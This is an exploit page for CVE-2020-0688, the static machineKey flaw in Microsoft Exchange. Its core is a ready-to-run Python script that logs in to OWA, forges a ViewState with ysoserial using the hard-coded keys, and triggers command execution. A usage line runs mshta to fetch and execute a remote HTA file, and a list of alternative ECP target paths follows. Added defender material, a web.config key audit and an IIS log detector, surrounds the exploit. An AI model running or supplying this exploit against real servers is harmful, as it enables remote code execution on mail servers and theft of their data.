CVE-2020-0688: Microsoft Exchange Server static key flaw leading to remote code execution (EXP)

Overview

In the February 2020 Patch Tuesday release, Microsoft shipped an important patch that fixes a remote code execution vulnerability in Microsoft Exchange Server. The vulnerability was reported to us by an anonymous researcher, affects every supported version of Microsoft Exchange Server, and is fixed by the February updates.

Video: https://youtu.be/7d_HoQ0LVy8

Initially, Microsoft described the bug as a memory corruption vulnerability that could be exploited by sending a specially crafted email to a vulnerable Exchange server. Microsoft has since revised its write-up and now states that the vulnerability is caused by Exchange Server failing to create a unique cryptographic key at installation time: every install shares the same ASP.NET machineKey, so anyone who knows the fixed validation key can produce a ViewState blob with a valid MAC, and the server will deserialize it.
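As an added defender-side example (not part of the original post), the following Python script audits an ASP.NET web.config for exactly the static machineKey values this vulnerability is about. The two key constants are the ones the exploit below hands to ysoserial; both web.config snippets are constructed samples, and the assumption that the relevant file is the web.config of Exchange's ECP virtual directory is something to confirm against your own install before pointing the script at a real path.

```python
import xml.etree.ElementTree as ET

# Static machineKey values carried by the ECP web.config of affected Exchange
# builds (the same values the exploit on this page passes to ysoserial).
STATIC_VALIDATION_KEY = "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"
STATIC_DECRYPTION_KEY = "E9D2490BD0075B51D1BA5288514514AF"

# Constructed sample: an unpatched install still carrying the static keys.
VULNERABLE_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <system.web>
    <machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"
                decryptionKey="E9D2490BD0075B51D1BA5288514514AF"
                validation="SHA1" decryption="3DES" />
  </system.web>
</configuration>
"""

# Constructed sample: a per-server key (hex chosen for this example, not a real install).
PATCHED_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <system.web>
    <machineKey validationKey="0F1E2D3C4B5A69788796A5B4C3D2E1F00F1E2D3C4B5A69788796A5B4C3D2E1F0"
                decryptionKey="A1B2C3D4E5F60718293A4B5C6D7E8F90"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>
"""


def machine_keys(config_xml):
    """Return the attribute dict of every <machineKey> element in a web.config string."""
    root = ET.fromstring(config_xml)
    return [dict(el.attrib) for el in root.iter("machineKey")]


def audit_machine_key(config_xml):
    """Return a list of findings for the config; an empty list means nothing to report."""
    findings = []
    for mk in machine_keys(config_xml):
        vk = mk.get("validationKey", "").upper()
        dk = mk.get("decryptionKey", "").upper()
        if vk == STATIC_VALIDATION_KEY:
            findings.append("static: validationKey is the known CVE-2020-0688 value")
        if dk == STATIC_DECRYPTION_KEY:
            findings.append("static: decryptionKey is the known CVE-2020-0688 value")
        # Weak MAC / cipher choices are worth reporting even once the key is unique.
        if mk.get("validation", "").upper() == "SHA1":
            findings.append("weak: validation=SHA1 (prefer HMACSHA256 or stronger)")
        if mk.get("decryption", "").upper() == "3DES":
            findings.append("weak: decryption=3DES (prefer AES)")
    return findings


def is_vulnerable(config_xml):
    """True when either static key is present, i.e. the ViewState MAC is forgeable."""
    return any(f.startswith("static:") for f in audit_machine_key(config_xml))


if __name__ == "__main__":
    import sys
    # Usage: python audit_machinekey.py <path-to-web.config>; with no argument
    # the constructed vulnerable sample is audited so the script runs offline.
    text = open(sys.argv[1], encoding="utf-8-sig").read() if len(sys.argv) > 1 else VULNERABLE_CONFIG
    for finding in audit_machine_key(text) or ["no findings"]:
        print(finding)
```

The check is deliberately case-insensitive on the hex, because web.config values are sometimes re-typed by hand. A clean result on the static-key check only means the key is no longer the shared one; the weak-algorithm findings are still worth acting on, since a leaked per-server key would put you back in the same position.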

Exploit:

# encoding: UTF-8
import requests
import readline
import argparse
import re
import sys
import os
import urllib3
from urllib.parse import urlparse
from urllib.parse import quote
urllib3.disable_warnings()

# ysoserial.net is expected in a sibling directory of this script
ysoserial_path = os.path.abspath(os.path.dirname(__file__))+"/ysoserial-1.32/"
session = requests.Session()


def get_value(url, user, pwd):
    # Log in to OWA, then read __VIEWSTATEGENERATOR and the ASP.NET_SessionId cookie from /ecp
    print("[*] Tring to login owa...")
    tmp = urlparse(url)
    base_url = "{}://{}".format(tmp.scheme, tmp.netloc)
    paramsPost = {"password": ""+pwd+"", "isUtf8": "1", "passwordText": "", "trusted": "4",
                  "destination": ""+url+"", "flags": "4", "forcedownlevel": "0", "username": ""+user+""}
    headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Upgrade-Insecure-Requests": "1",
               "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0", "Connection": "close", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Cookie": "PrivateComputer=true; PBack=0"}
    cookies = {"PBack": "0", "PrivateComputer": "true"}
    login_url = base_url + '/owa/auth.owa'
    print("[+] Login url: {}".format(login_url))
    try:
        login = session.post(login_url, data=paramsPost,
                             headers=headers, verify=False, timeout=30)
        print("[*] Status code: %i" % login.status_code)
        if "reason=" in login.text or "reason=" in login.url and "owaLoading" in login.text:
            print("[!] Login Incorrect, please try again with a different account..")
            # sys.exit(1)
        #print(str(response.text))
    except Exception as e:
        print("[!] login error , error: {}".format(e))
        sys.exit(1)
    print("[+] Login successfully! \n")
    try:
        print("[*] Tring to get __VIEWSTATEGENERATOR...")
        target_url = "{}/ecp/default.aspx".format(base_url)
        new_response = session.get(target_url, verify=False, timeout=15)
        view = re.compile(
            'id="__VIEWSTATEGENERATOR" value="(.+?)"').findall(str(new_response.text))[0]
        print("[+] Done! __VIEWSTATEGENERATOR:{}".format(view))
    except:
        view = "B97B4E27"
        print("[*] Can't get __VIEWSTATEGENERATOR, use default value: {}".format(view))
    try:
        print("[*] Tring to get ASP.NET_SessionId....")
        key = session.cookies['ASP.NET_SessionId']
        print("[+] Done!  ASP.NET_SessionId: {}".format(key))
    except Exception as e:
        key = None
        print("[!] Get ASP.NET_SessionId error, error: {} \n[*] Exit..".format(e))
    return view, key, base_url


def ysoserial(cmd):
    # Run ysoserial.exe and return the last line of its output (the generated ViewState)
    cmd = ysoserial_path+cmd
    r = os.popen(cmd)
    res = r.readlines()
    return res[-1]


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("-s", "--server", required=True, help="ECP Server URL Example: http://ip/owa")
    parser.add_argument("-u", "--user", required=True, help="login account Example: domain\\user")
    parser.add_argument("-p", "--password", required=True, help="Password")
    parser.add_argument("-c", "--cmd", help="Command u want to execute", required=True)
    parser.add_argument("-e", "--encrypt", help="Encrypt the payload", action='store_true', default=False)
    args = parser.parse_args()
    url = args.server
    print("[*] Start to exploit..")
    user = args.user
    pwd = args.password
    command = args.cmd
    view, key, base_url = get_value(url, user, pwd)
    if key is None:
        key = 'test'
        sys.exit(1)
    ex_payload = """ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{}" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="{}" \
--viewstateuserkey="{}" --islegacy """.format(command, view, key)
    if args.encrypt:
        re_payload = ex_payload + ' --decryptionalg="3DES" --decryptionkey="E9D2490BD0075B51D1BA5288514514AF" --isencrypted'
    else:
        re_payload = ex_payload + " --isdebug"
    print("\n"+re_payload)
    out_payload = ysoserial(re_payload)
    if args.encrypt:
        final_exp = "{}/ecp/default.aspx?__VIEWSTATEENCRYPTED=&__VIEWSTATE={}".format(base_url, quote(out_payload))
    else:
        final_exp = "{}/ecp/default.aspx?__VIEWSTATEGENERATOR={}&__VIEWSTATE={}".format(base_url, view, quote(out_payload))
    print("\n[+] Exp url: {}".format(final_exp))
    print("\n[*] Auto trigger payload..")
    status = session.get(final_exp, verify=False, timeout=15)
    if status.status_code == 500:
        print("[*] Status code: %i, Maybe success!" % status.status_code)


if __name__ == "__main__":
    main()

Usage:

python3 CVE-2020-0688_EXP.py -h
usage: CVE-2020-0688_EXP.py [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e]

optional arguments:
  -h, --help            show this help message and exit
  -s SERVER, --server SERVER
                        ECP Server URL Example: http://ip/owa
  -u USER, --user USER  login account Example: domain\user
  -p PASSWORD, --password PASSWORD
                        Password
  -c CMD, --cmd CMD     Command u want to execute
  -e, --encrypt         Encrypt the payload

Example:
python CVE-2020-0688_EXP.py -s https://mail.x.com/ -u [email protected] -p passwd -c "mshta http://1.1.1.1/test.hta"

Other usable paths (each ECP page has its own __VIEWSTATEGENERATOR value):

/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27
/ecp/PersonalSettings/HomePage.aspx?showhelp=false&__VIEWSTATEGENERATOR=1D01FD4E
/ecp/Organize/AutomaticReplies.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/RulesEditor/InboxRules.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/Organize/DeliveryReports.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/MyGroups/PersonalGroups.aspx?showhelp=false&__VIEWSTATEGENERATOR=A767F62B
/ecp/MyGroups/ViewDistributionGroup.aspx?pwmcid=1&id=38f4bec5-704f-4272-a654-95d53150e2ae&ReturnObjectType=1&__VIEWSTATEGENERATOR=321473B8
/ecp/Customize/Messaging.aspx?showhelp=false&__VIEWSTATEGENERATOR=9C5731F0
/ecp/Customize/General.aspx?showhelp=false&__VIEWSTATEGENERATOR=72B13321
/ecp/Customize/Calendar.aspx?showhelp=false&__VIEWSTATEGENERATOR=4AD51055
/ecp/Customize/SentItems.aspx?showhelp=false&__VIEWSTATEGENERATOR=4466B13F
/ecp/PersonalSettings/Password.aspx?showhelp=false&__VIEWSTATEGENERATOR=59543DCA
/ecp/SMS/TextMessaging.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/TroubleShooting/MobileDevices.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/Customize/Regional.aspx?showhelp=false&__VIEWSTATEGENERATOR=9097CD08
/ecp/MyGroups/SearchAllGroups.slab?pwmcid=3&ReturnObjectType=1__VIEWSTATEGENERATOR=FD338EE0
/ecp/Security/BlockOrAllow.aspx?showhelp=false&__VIEWSTATEGENERATOR=362253EF
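Every path above is reached by the exploit with the ViewState in the GET query string, whereas the ECP pages themselves post __VIEWSTATE in the request body. That is the signal a defender can hunt for in the IIS logs of the ECP virtual directory. The following Python detector is an added example, not part of the original post: it parses W3C-format IIS log lines using the #Fields header, flags any GET to /ecp/ whose query string carries __VIEWSTATE, and raises severity when the server answered 500 (the response the exploit itself treats as "maybe success"). The log excerpt is constructed; real Exchange logs carry more columns, which the header-driven parser tolerates.

```python
from urllib.parse import parse_qs

# Constructed IIS W3C log excerpt for the ECP virtual directory. The field set
# is trimmed to what the check needs; the parser maps columns from the
# "#Fields:" header, so a real log with extra columns parses the same way.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username c-ip sc-status
2020-02-26 10:01:12 GET /ecp/default.aspx - CORP\\alice 10.0.0.5 200
2020-02-26 10:01:15 POST /ecp/default.aspx - CORP\\alice 10.0.0.5 200
2020-02-26 10:02:40 GET /ecp/default.aspx __VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEy... CORP\\alice 198.51.100.7 500
2020-02-26 10:03:02 GET /ecp/Customize/General.aspx showhelp=false&__VIEWSTATEGENERATOR=72B13321&__VIEWSTATE=%2FwEy... CORP\\alice 198.51.100.7 500
2020-02-26 10:04:10 GET /owa/auth/logon.aspx url=https%3A%2F%2Fmail%2Fowa - 10.0.0.9 200
"""


def parse_iis_log(text):
    """Yield one dict per request line, keyed by the column names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def viewstate_in_query(entry):
    """ECP pages post ViewState in the body, so __VIEWSTATE as a GET parameter is anomalous."""
    stem = entry.get("cs-uri-stem", "").lower()
    query = entry.get("cs-uri-query", "-")
    if not stem.startswith("/ecp/") or query == "-":
        return False
    return "__VIEWSTATE" in parse_qs(query, keep_blank_values=True)


def detect_cve_2020_0688(text):
    """Return a list of suspicious requests, each with a severity and the fields an analyst needs."""
    hits = []
    for entry in parse_iis_log(text):
        if not viewstate_in_query(entry):
            continue
        # HTTP 500 after deserialising a forged ViewState is the exploit's own success signal.
        severity = "high" if entry.get("sc-status") == "500" else "medium"
        hits.append({
            "time": "{} {}".format(entry["date"], entry["time"]),
            "user": entry.get("cs-username"),
            "client": entry.get("c-ip"),
            "path": entry["cs-uri-stem"],
            "status": entry.get("sc-status"),
            "severity": severity,
        })
    return hits


if __name__ == "__main__":
    import sys
    # Usage: python detect_viewstate_get.py <u_ex*.log>; with no argument the constructed sample is scanned.
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_LOG
    for hit in detect_cve_2020_0688(text):
        print("{severity:6} {time} {client} {user} {path} -> {status}".format(**hit))
```

The cs-username column is worth keeping in the output: the exploit needs a valid mailbox login first, so the account that appears next to the hit is the one whose credentials were used and should be reset along with the investigation of the source address (which may be a load balancer if X-Forwarded-For is not being logged).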

Update and fix

The security update articles for all supported versions of Microsoft Exchange Server, and the corresponding downloads, are listed in the table below:

Product                                                          | Article | Download
-----------------------------------------------------------------|---------|----------------
Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30   | 4536989 | Security Update
Microsoft Exchange Server 2013 Cumulative Update 23              | 4536988 | Security Update
Microsoft Exchange Server 2016 Cumulative Update 14              | 4536987 | Security Update
Microsoft Exchange Server 2016 Cumulative Update 15              | 4536987 | Security Update
Microsoft Exchange Server 2019 Cumulative Update 3               | 4536987 | Security Update
Microsoft Exchange Server 2019 Cumulative Update 4               | 4536987 | Security Update